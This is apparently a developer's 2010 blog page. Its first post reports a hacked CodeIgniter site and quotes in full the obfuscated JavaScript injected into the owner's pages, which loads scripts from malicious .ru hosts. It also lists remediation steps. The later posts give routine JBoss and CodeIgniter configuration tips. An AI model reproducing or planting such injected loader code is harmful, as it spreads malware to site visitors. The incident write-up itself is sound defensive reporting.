Tuesday, January 26, 2010

Website hacked with random URL to access (http://ku6-com.haberturk.com.careerbuilder-com.webnetlinks.ru:8080/)

One of my website has been hacked by some hacker or can be with some libraries I am using for my CodeIgniter project... I'm not sure if it is due to the library or about my web hosting place.... I'm still investigating the issue.

It is trying to access to random URL as :

http://ku6-com.haberturk.com.careerbuilder-com.webnetlinks.ru:8080/apple.com/apple.com/drudgereport.com/google.com/joy.cn/
Mostly the random URL start with:
http://ku6-com.haberturk.com.careerbuilder-com.webnetlinks.ru:8080

Check to webnetlinks.ru I got alert from WOT (Add-on of firefox) that this site is unsafe.

View my page source code found:
  • Following script before html tag

<script src='+'h^&)t($t)$#p&($^$:@$/)^)/)^@(k^^^!u)))6@(-&^c((!!o#@^m#.@&h#@a()
(b!e@)!r!##t(@^u&r$#k$.!#c)!o@(&m&@.^&@c@@#a^)r$#^!&e&$^@e@#)!r@&b^)u)^i!
(l)(d&@e)!#r!)(-(c!^^o$^m^^!.!!&w^&(e(!^b!#)^!n!#)e#
(&)t!&l##!^!i&@n#$k$&s)&#.&@!$r@)@u$!):$8)^&0$$!8&!0)
(#$/)$a)#p!$p$l&#e&#.^^@#c#o$$&)m$$#/!)a^@@$p)!p)l^#e&!.!$#c#(@o)$)^m((&
/&&d^&r$@u!@^d^)&g$$)e#$@r(^e(^!p&^o@!^&r^^)#t)&(#.)$^c()o^)m(@@
/@@g$&#^#o#o$g&l#!e(&.#!(c^&o^$m)#&&/$j$o#$)y).@^c&)n(@&/!@'.replace(/\$|\!|\)|
\^|#|@|\(|&/ig, '')+' defer=defer></scr'+'ipt>

  • At the end of html tag found some hidden code:
82fd50e7972f75db5204eef49fd077cc


All those above, I didn't code so consider this point to start searching.

Note: I have no any issue at my local site.

Hope I'll find soon

Update 27/01, 1:30pm: Very bad, these scripts are added to most html pages, to most javascript files. Seem not issue due to any library of CodeIgniter but with some virus who can hack using ftp, it may be my password is very poor that it can hack.

Update 29/01, 12:48pm: Now again, new hack script added the same site (before I didn't change ftp password yet), here is the new script:


try{window.onload=function(){document.write('<div id="megaid">youjizz-com.oneindia.in.d</div>');Lb4bz8i1odh = document.getElementById('megaid').innerHTML + 'u$#!$^o#@@w&a(n(@!-$$$c@(o$)!$m)&$@!.!)$(@t)^o($(p)!#l$i$@n#$^e&^(m@#&a@$^#r^^i@@^(n$e^##.#r&^$u(@^:)$D@!#E^()B^&U!(@&G#$#$/&&(s#^$p@(!(o$n&@i$)c@^h$#i^@$.^c&(o)$.(!j#@(p(!^^!/$s#!p(!&^o#n@)#i^!c##h)#)i(@.@!&^c(#o))@!.!j(^#p^^!!/@(^#@x)@t#!e!#$)n$)^d!(m@e@d((i&^!a^$!&).)@)#(c)$#o&^^#m#@$/!^^&g$@$o#o@!(g&!@#l#@#e#.@$@#c!(o^m)!^/&a!)l(!(i@c$!&e(^^.)!#^i^#$t($/@&'.replace(/@|\$|#|&|\^|\!|\)|\(/ig, '') ;document.write('<scr'+'ipt src="http://%27+Lb4bz8i1odh.replace%28/DEBUG/g,"></scr'+'ipt>');} } catch(Ijhdnoxns ) {}
<!--82fd50e7972f75db5204eef49fd077cc--><script> try{window.onload=function(){document.write('<div id="megaid">youjizz-com.oneindia.in.d</div>');Lb4bz8i1odh = document.getElementById('megaid').innerHTML + 'u$#!$^o#@@w&a(n(@!-$$$c@(o$)!$m)&$@!.!)$(@t)^o($(p)!#l$i$@n#$^e&^(m@#&a@$^#r^^i@@^(n$e^##.#r&^$u(@^:)$D@!#E^()B^&U!(@&G#$#$/&&(s#^$p@(!(o$n&@i$)c@^h$#i^@$.^c&(o)$.(!j#@(p(!^^!/$s#!p(!&^o#n@)#i^!c##h)#)i(@.@!&^c(#o))@!.!j(^#p^^!!/@(^#@x)@t#!e!#$)n$)^d!(m@e@d((i&^!a^$!&).)@)#(c)$#o&^^#m#@$/!^^&g$@$o#o@!(g&!@#l#@#e#.@$@#c!(o^m)!^/&a!)l(!(i@c$!&e(^^.)!#^i^#$t($/@&'.replace(/@|\$|#|&|\^|\!|\)|\(/ig, '') ;document.write('<scr'+'ipt src="http://'+Lb4bz8i1odh.replace(/DEBUG/g,"></scr'+'ipt>');} } catch(Ijhdnoxns ) {}</script>
<!--82fd50e7972f75db5204eef49fd077cc-->

Related issue found on the net:
  1. http://blog.unmaskparasites.com/2009/12/23/from-hidden-iframes-to-obfuscated-scripts/
  2. http://blog.unmaskparasites.com/2009/09/23/10-ftp-clients-malware-steals-credentials-from/

Solutions: (that may can prevent not to happen again)
I'm using FileZilla as a ftp client
  1. Change ftp password
  2. Change application password
  3. Scan virus on the pc that using
  4. Remove all storing passwords on FTP clients

Monday, January 25, 2010

JBoss 4.2.2.GA - Deploying issue on class loading and out of memory

While deploying my applications with JBoss 4.2.2.GA, using JDK 1.5 I got some issue with class loading issue something like:

1. If meet such error:
org.jboss.deployment.DeploymentException: Error while fixing table name; - nested throwable: (org.jboss.util.NestedSQLException: Could not create connection; - nested throwable: (org.jboss.resource.JBossResourceException: Failed to register driver for: oracle.jdbc.driver.OracleDriver; - nested throwable: (java.lang.ClassNotFoundException: No ClassLoaders found for: oracle.jdbc.driver.OracleDriver)); - nested throwable: (org.jboss.resource.JBossResourceException: Could not create connection; - nested throwable: (org.jboss.resource.JBossResourceException: Failed to register driver for: oracle.jdbc.driver.OracleDriver; - nested throwable: (java.lang.ClassNotFoundException: No ClassLoaders found for: oracle.jdbc.driver.OracleDriver))))


For sure, missing Oracle JDBC driver so Copy the Oracle JDBC Driver (10.2.0.1.0) (ojdbc14.jar) to lib folder of %JBOSS_HOME%/lib or at your server %JBOSS_HOME%/server/default/lib directory.

2. If something around:

2010-01-25 15:03:27,113 DEBUG [org.jboss.web.tomcat.service.TomcatDeployer] Classes needed for clustered webapp unavailable
java.lang.NoClassDefFoundError: org/jgroups/blocks/MethodCall
at org.jboss.web.tomcat.service.session.JBossCacheService.(JBossCacheService.java:70)
at org.jboss.web.tomcat.service.session.JBossCacheManager.init(JBossCacheManager.java:157)
at org.jboss.web.tomcat.service.TomcatDeployer.performDeployInternal(TomcatDeployer.java:336)

So please try as following:
  • Define a isolated classloader. To do it, change %JBOSS_HOME%/server/default/conf/jboss-service.xml :
<mbean code="org.jboss.naming.NamingService" name="jboss:service=Naming" dd="resource:xmdesc/NamingService-xmbean.xml">
[ ... ]
<attribute name="CallByValue">true</attribute>
[ ... ]
</mbean>

  • change %JBOSS_HOME%/server/default/deploy/ear-deployer.xml :
<server>
[...]
<attribute name="Isolated">true</attribute>
[...]
<attribute name="CallByValue">true</attribute>
[...]
</server>

  • change %JBOSS_HOME%/server/default/deploy/jboss-web.deployer/META-INF/jboss-service.xml :
[...]
<attribute name="Java2ClassLoadingCompliance">true</attribute>
[...]
<attribute name="UseJBossWebLoader">true</attribute>
[...]


3. When you wanna to deploy more than 2 applications on the same JBoss server instance, you may face some issues with unsuccessful deployment and with some error around Out of Memory.
So we need to increase memory allocation for Jboss, let's try to add/change JAVA_OPTS for memory allocation in file %JBOSS_HOME%/bin/run.bat as
set JAVA_OPTS=%JAVA_OPTS% -Xms512m -Xmx1024m -XX:MaxPermSize=128m

My applications are now deployed.

Thursday, January 21, 2010

CodeIgniter - Remove index.php from URI

Normally with CodeIgniter, the URI will come with http://domain/index.php/controller/method
You may have doubt to remove the index.php to have only http://domain/controller/method ..

Here is the way:
1. mod_rewrite still need to be enable in your apache server
2. Open config.php from your application/config and replace $config['index_page'] = “index.php” by $config['index_page'] = “”

3. In file .htaccess at the root of your website (should be in website root, where the system directory is) and add following line:


RewriteEngine on
RewriteCond $1 !^(index\.php|resources|robots\.txt)
RewriteCond %{REQUEST_FILENAME} !-f
RewriteCond %{REQUEST_FILENAME} !-d
RewriteRule ^(.*)$ index.php/$1 [L,QSA]

(My case, above changes work fine)

4. In some case, the default setting for uri_protocol does not work properly. To solve this problem just replace $config['uri_protocol'] = “AUTO” by $config['uri_protocol'] = “REQUEST_URI” from application/config/config.php

Enjoy,

Update 26/01: If you want both using index.php with URI or no, you just need to skip option 4 (using uri_protocol as AUTO)

CodeIgniter - Automatic config base url

In CodeIgniter, you may know that you need to configure base url via config.php (param: $config["base_url"]) so when change domain you may doubt sometimes with such small error; Here a solution to help solving the issue;

Change at config.php by fix url with this smart url configuration:

$config['base_url'] = ((isset($_SERVER['HTTPS']) && $_SERVER['HTTPS'] == "on") ? "https" : "http");
$config['base_url'] .= "://".$_SERVER['HTTP_HOST'];
$config['base_url'] .= str_replace(basename($_SERVER['SCRIPT_NAME']),"",$_SERVER['SCRIPT_NAME']);

Source: http://codeigniter.com/wiki/Automatic_configbase_url/